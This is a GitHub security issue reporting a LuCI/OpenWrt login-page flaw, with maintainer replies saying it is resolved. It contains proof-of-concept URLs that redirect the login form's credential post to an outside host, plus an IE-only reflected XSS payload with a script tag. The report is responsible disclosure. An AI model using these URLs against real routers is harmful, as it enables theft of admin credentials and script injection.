Possible to change form post URL for the login page - potential leak of admin credentials
See original GitHub issueBy adding an extra / after the beginning of that path the login form will submitted to a third party web site.
Example:
http://192.168.56.2//httpbin.org/anything/..%2f..%2f/cgi-bin/luci/
Resulting HTML: <form method="post" action="//httpbin.org/anything/…%2f…%2f/cgi-bin/luci/">
The URL is reflected in the response. An attacker can use this to trick an admin to submitting the username and password to an attacker-controlled website. Modern browsers will likely make this hard to exploit especially since #1343 was introduced.
A possible solution should be to make sure the form action URL always starts with a leading .
before the first /
.
Side note:
Another attack (XSS) that only works in Internet Explorer.
http://192.168.56.2//192.168.56.2/..%2f/cgi-bin/luci/?iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii<script>alert(1)</script>
IE does not encode <
and >
in the query string (as opposed to FF/Chrome) and because the form is submitted from the same domain, the XSS filter in IE doesn’t block the XSS attack.
Verified on:
Powered by LuCI Master (git-18.088.49307-90ed423) / OpenWrt SNAPSHOT r6567-db893ec
Let me know if there is another preferred method of reporting security issues.
Issue Analytics
- State:
- Created 5 years ago
- Comments:5 (3 by maintainers)
Top GitHub Comments
Then this XSS issue is unrelated to LuCI and needs to be fixed in uhttpd instead.
Seems to working now. I’m closing.